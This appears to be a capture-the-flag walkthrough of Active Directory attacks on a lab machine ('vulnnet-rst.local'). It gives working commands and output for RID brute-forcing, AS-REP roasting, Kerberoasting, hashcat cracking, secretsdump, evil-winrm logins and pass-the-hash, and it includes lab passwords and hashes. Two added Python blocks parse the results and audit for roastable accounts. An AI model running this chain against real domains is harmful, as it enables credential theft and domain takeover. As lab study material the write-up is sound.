Windows Tools

There are plenty of tools for enumerating and exploiting Active Directory. These notes cover them one at a time; as I use each tool, I'll add more explanation.

crackmapexec

We can enumerate users if we have at least READ access to the IPC$ share.

crackmapexec smb 10.10.81.3 -u 'guest' -p '' --rid-brute

Example output (shortened):

┌─[parrot@parrot][~/Desktop]
└──╼ $crackmapexec smb 10.10.81.3 -u 'guest' -p '' --rid-brute
SMB         10.10.81.3      445    WIN-2BO8M1OE1M1  [*] Windows 10.0 Build 17763 x64 (name:WIN-2BO8M1OE1M1) (domain:vulnnet-rst.local) (signing:True) (SMBv1:False)
SMB         10.10.81.3      445    WIN-2BO8M1OE1M1  [+] vulnnet-rst.local\guest: 
SMB         10.10.81.3      445    WIN-2BO8M1OE1M1  [+] Brute forcing RIDs
SMB         10.10.81.3      445    WIN-2BO8M1OE1M1  498: VULNNET-RST\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.81.3      445    WIN-2BO8M1OE1M1  500: VULNNET-RST\Administrator (SidTypeUser)
SMB         10.10.81.3      445    WIN-2BO8M1OE1M1  501: VULNNET-RST\Guest (SidTypeUser)
SMB         10.10.81.3      445    WIN-2BO8M1OE1M1  502: VULNNET-RST\krbtgt (SidTypeUser)
SMB         10.10.81.3      445    WIN-2BO8M1OE1M1  512: VULNNET-RST\Domain Admins (SidTypeGroup)
SMB         10.10.81.3      445    WIN-2BO8M1OE1M1  513: VULNNET-RST\Domain Users (SidTypeGroup)
SMB         10.10.81.3      445    WIN-2BO8M1OE1M1  1104: VULNNET-RST\enterprise-core-vn (SidTypeUser)
SMB         10.10.81.3      445    WIN-2BO8M1OE1M1  1105: VULNNET-RST\a-whitehat (SidTypeUser)
SMB         10.10.81.3      445    WIN-2BO8M1OE1M1  1109: VULNNET-RST\t-skid (SidTypeUser)
SMB         10.10.81.3      445    WIN-2BO8M1OE1M1  1110: VULNNET-RST\j-goldenhand (SidTypeUser)
SMB         10.10.81.3      445    WIN-2BO8M1OE1M1  1111: VULNNET-RST\j-leet (SidTypeUser)

To extract the user accounts from the saved output, you can use this grep command (the lookahead on `(SidTypeUser)` drops the groups, and `[^\\ ]+` keeps names that contain hyphens or a trailing `$`):

grep -oP '(?<=\\)[^\\ ]+(?= \(SidTypeUser\))' output.txt > usernames.txt

Example output:

┌─[parrot@parrot][~/Desktop]
└──╼ $grep -oP '(?<=\\)[^\\ ]+(?= \(SidTypeUser\))' output.txt
Administrator
Guest
krbtgt
WIN-2BO8M1OE1M1$
enterprise-core-vn
a-whitehat
t-skid
j-goldenhand
j-leet
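The same extraction in Python, as an added example that is not part of the original page: it parses the `RID: DOMAIN\name (SidType...)` lines that crackmapexec prints, separates users from groups, drops machine accounts (trailing `$`) and flags the well-known built-in RIDs. The sample lines are copied from the output above, except the RID of the machine account, which is a constructed value because the page's listing is shortened.

```python
import re
from typing import Dict, List

# Constructed sample: lines copied from the crackmapexec --rid-brute output above.
# The machine account's RID (1000) is assumed; the page's listing is shortened.
SAMPLE_OUTPUT = r"""
SMB         10.10.81.3      445    WIN-2BO8M1OE1M1  [+] Brute forcing RIDs
SMB         10.10.81.3      445    WIN-2BO8M1OE1M1  498: VULNNET-RST\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.81.3      445    WIN-2BO8M1OE1M1  500: VULNNET-RST\Administrator (SidTypeUser)
SMB         10.10.81.3      445    WIN-2BO8M1OE1M1  502: VULNNET-RST\krbtgt (SidTypeUser)
SMB         10.10.81.3      445    WIN-2BO8M1OE1M1  512: VULNNET-RST\Domain Admins (SidTypeGroup)
SMB         10.10.81.3      445    WIN-2BO8M1OE1M1  1000: VULNNET-RST\WIN-2BO8M1OE1M1$ (SidTypeUser)
SMB         10.10.81.3      445    WIN-2BO8M1OE1M1  1105: VULNNET-RST\a-whitehat (SidTypeUser)
SMB         10.10.81.3      445    WIN-2BO8M1OE1M1  1109: VULNNET-RST\t-skid (SidTypeUser)
"""

# One RID-brute result line: "<rid>: <DOMAIN>\<name> (SidTypeUser|SidTypeGroup|...)".
# The name may contain spaces, so it is matched lazily up to the " (SidType" suffix.
RID_LINE = re.compile(
    r"^SMB\s+\S+\s+\d+\s+\S+\s+(?P<rid>\d+):\s+(?P<domain>[^\\]+)\\"
    r"(?P<name>.+?)\s+\((?P<kind>SidType\w+)\)\s*$"
)


def parse_rid_brute(text: str) -> List[Dict[str, object]]:
    """Turn RID-brute output into records; status lines like '[+] ...' are skipped."""
    entries: List[Dict[str, object]] = []
    for line in text.splitlines():
        m = RID_LINE.match(line)
        if m:
            entries.append({"rid": int(m["rid"]), "domain": m["domain"],
                            "name": m["name"], "kind": m["kind"]})
    return entries


def user_accounts(entries: List[Dict[str, object]], include_machines: bool = False) -> List[str]:
    """Names of SidTypeUser principals; computer accounts (trailing '$') are dropped by default."""
    return [str(e["name"]) for e in entries
            if e["kind"] == "SidTypeUser"
            and (include_machines or not str(e["name"]).endswith("$"))]


def builtin_principals(entries: List[Dict[str, object]]) -> List[str]:
    """RIDs below 1000 are well-known (500 Administrator, 502 krbtgt, 512 Domain Admins, ...)."""
    return [str(e["name"]) for e in entries if int(e["rid"]) < 1000]
```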

GetNPUsers.py

ASREPRoasting

AS-REP roasting is possible when a user account has the "Do not require Kerberos preauthentication" flag set. This means that a client does not need to prove knowledge of the account's password before requesting a Kerberos ticket for that account, so the KDC returns a response (AS-REP) that is encrypted with a key derived from the account's password and can be attacked offline.

We can retrieve these tickets using the GetNPUsers.py tool from Impacket, which queries the Key Distribution Center for AS-REP roastable accounts. The only thing needed to query accounts is a valid list of usernames, which we enumerated previously during our SMB enumeration.

GetNPUsers.py vulnnet-rst.local/ -dc-ip 10.10.222.122 -usersfile userlist -no-pass -request -outputfile kerberos-users-found

Example output:

┌─[parrot@parrot][~/Desktop]
└──╼ $GetNPUsers.py vulnnet-rst.local/ -dc-ip 10.10.81.3 -u users.txt -no-pass -request -outputfile kerberos-users-found
Impacket v0.12.0.dev1+20231103.113049.2d00fc6a - Copyright 2023 Fortra

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User WIN-2BO8M1OE1M1$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User enterprise-core-vn doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a-whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$t-skid@VULNNET-RST.LOCAL:dda93bdab23cc46be79eb99dc673bd6e$26b123176195736f8d31623b3e99722ac17ffe5e5c2720d5fb9f85b42c916f40a6587f2a7a8cfced2d387ba14247142b32777383f54cec8ad4b37f8d3174078d93baf1732757aaf43fc921aa5b1d213c71ef132eee02ac345f103e9d8e8426831413e6c9254a604afe26dc6bf9820207a13e051d14ce7b21a288b2ceb37030bd8819a4f57d5f4dafe25ced2c473406191a01308b8df3e345a88393d9bfa390ad13722dba7c2278e17493c5bafdb732da25a06ed063237737dc4b2e25c3ad3abe3a7be434b5af9dec2129eeb6d6c94d683296e8fda2d152de456ac422f97f3d60324903d7ae0de46921ac69b61f02ad80e7313079b2af
[-] User j-goldenhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-leet doesn't have UF_DONT_REQUIRE_PREAUTH set

We can use hashcat to crack the hashes.

hashcat -m 18200 hashes.txt rockyou.txt

GetUserSPNs.py

Kerberoasting

Now that I have a set of standard user credentials, I can look for accounts that have Service Principal Names (SPNs) registered and request a Ticket Granting Service (TGS) ticket for each SPN using the GetUserSPNs.py tool from Impacket.
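Both roasting techniques on this page hinge on bits in the `userAccountControl` attribute and on whether an account has an SPN. The following added example (my code, not Impacket's or the page's) audits a directory export for exactly these conditions so a defender can find and fix exposed accounts before anyone else does; the `UF_*` values are the documented Windows `ADS_USER_FLAG_ENUM` constants, while the account records, their flag combinations and the SPN strings are constructed and only borrow the names seen above.

```python
from typing import Dict, List

# userAccountControl bits (ADS_USER_FLAG_ENUM values from the Windows SDK).
UF_ACCOUNTDISABLE = 0x00000002
UF_NORMAL_ACCOUNT = 0x00000200
UF_WORKSTATION_TRUST_ACCOUNT = 0x00001000   # domain-joined computer
UF_SERVER_TRUST_ACCOUNT = 0x00002000        # domain controller
UF_DONT_EXPIRE_PASSWD = 0x00010000
UF_TRUSTED_FOR_DELEGATION = 0x00080000
UF_DONT_REQUIRE_PREAUTH = 0x00400000        # the AS-REP roasting flag

# Constructed sample records; UAC values and SPNs are assumptions, not data from the target.
# krbtgt is disabled by default (0x202), which is why the KDC answers CLIENT_REVOKED for it.
SAMPLE_ACCOUNTS: List[Dict[str, object]] = [
    {"sam": "Administrator", "uac": 0x10200, "spns": []},
    {"sam": "krbtgt", "uac": 0x202, "spns": ["kadmin/changepw"]},
    {"sam": "WIN-2BO8M1OE1M1$", "uac": 0x82000, "spns": ["HOST/WIN-2BO8M1OE1M1"]},
    {"sam": "t-skid", "uac": 0x410200, "spns": []},
    {"sam": "enterprise-core-vn", "uac": 0x10200, "spns": ["HTTP/app.vulnnet-rst.local"]},
    {"sam": "j-leet", "uac": 0x10200, "spns": []},
]


def is_disabled(acct: Dict[str, object]) -> bool:
    return bool(int(acct["uac"]) & UF_ACCOUNTDISABLE)


def is_machine(acct: Dict[str, object]) -> bool:
    return bool(int(acct["uac"]) & (UF_WORKSTATION_TRUST_ACCOUNT | UF_SERVER_TRUST_ACCOUNT))


def asrep_roastable(accounts: List[Dict[str, object]]) -> List[str]:
    """Enabled accounts with preauthentication disabled. Fix: clear the flag."""
    return [str(a["sam"]) for a in accounts
            if int(a["uac"]) & UF_DONT_REQUIRE_PREAUTH and not is_disabled(a)]


def kerberoastable(accounts: List[Dict[str, object]]) -> List[str]:
    """Enabled user (not computer) accounts that carry an SPN. Fix: gMSA or long random password."""
    return [str(a["sam"]) for a in accounts
            if a["spns"] and not is_machine(a) and not is_disabled(a)]


def kdc_expectation(acct: Dict[str, object]) -> str:
    """What an AS-REQ without preauthentication (as GetNPUsers.py sends) should get back."""
    if is_disabled(acct):
        return "KDC_ERR_CLIENT_REVOKED"
    if int(acct["uac"]) & UF_DONT_REQUIRE_PREAUTH:
        return "AS-REP returned"
    return "KDC_ERR_PREAUTH_REQUIRED"
```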

GetUserSPNs.py vulnnet-rst.local/t-skid:tj072889* -dc-ip 10.10.5.146 -request

This was successful and I was able to retrieve the TGS hash for the user enterprise-core-vn.

$krb5tgs$23$*enterprise-core-vn$VULNNET-RST.LOCAL$vulnnet-rst.local/enterprise-core-vn*$6abf4cc44a39bdcd4105132ce2de79e2$[...]

I can now use hashcat to retrieve the password for this user account.

hashcat64.exe -m 13100 hash.txt rockyou.txt

evil-winrm

With this new set of credentials, we are able to use evil-winrm to log in and retrieve the user flag.

evil-winrm -u 'enterprise-core-vn' -p '*******' -i 10.10.128.52 -N 

Pass the hash

evil-winrm -i 10.10.196.132 -u Administrator -H c2597747aa5e43022a3a3049a3c3b09d

secretsdump.py

Use secretsdump.py to dump the NTLM hashes for all the users on the DC machine.

secretsdump.py a-whitehat:bNdKVkjv3RR9ht@10.10.87.137

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf10a2788aef5f622149a41b2c745f49a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c2597747a******************:::

I was able to obtain the hash for the Administrator account and use evil-winrm to log in and get the root flag.

evil-winrm -i 10.10.196.132 -u Administrator -H c2597747aa5e43022a3a3049a3c3b09d